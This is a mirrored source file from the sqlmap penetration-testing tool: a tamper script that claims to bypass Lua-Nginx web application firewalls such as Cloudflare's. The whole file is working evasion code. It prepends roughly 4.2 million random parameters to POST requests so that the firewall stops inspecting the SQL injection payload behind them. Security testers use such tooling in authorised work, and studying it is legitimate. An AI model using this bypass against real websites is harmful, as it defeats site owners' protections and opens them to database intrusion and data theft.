mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-04-12 13:14:20 +03:00
40 lines
1.1 KiB
Python
40 lines
1.1 KiB
Python
#!/usr/bin/env python
|
|
|
|
"""
|
|
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
|
|
See the file 'LICENSE' for copying permission
|
|
"""
|
|
|
|
import random
|
|
import string
|
|
import os
|
|
|
|
from lib.core.compat import xrange
|
|
from lib.core.common import singleTimeWarnMessage
|
|
from lib.core.enums import HINT
|
|
from lib.core.enums import PRIORITY
|
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
|
|
|
__priority__ = PRIORITY.HIGHEST
|
|
|
|
def dependencies():
|
|
singleTimeWarnMessage("tamper script '%s' is only meant to be run on POST requests" % (os.path.basename(__file__).split(".")[0]))
|
|
|
|
def tamper(payload, **kwargs):
|
|
"""
|
|
LUA-Nginx WAFs Bypass (e.g. Cloudflare) with 4.2 million parameters
|
|
|
|
Reference:
|
|
* https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/
|
|
|
|
Notes:
|
|
* Lua-Nginx WAFs do not support processing of huge number of parameters
|
|
"""
|
|
|
|
hints = kwargs.get("hints", {})
|
|
delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)
|
|
|
|
hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(4194304))
|
|
|
|
return payload
|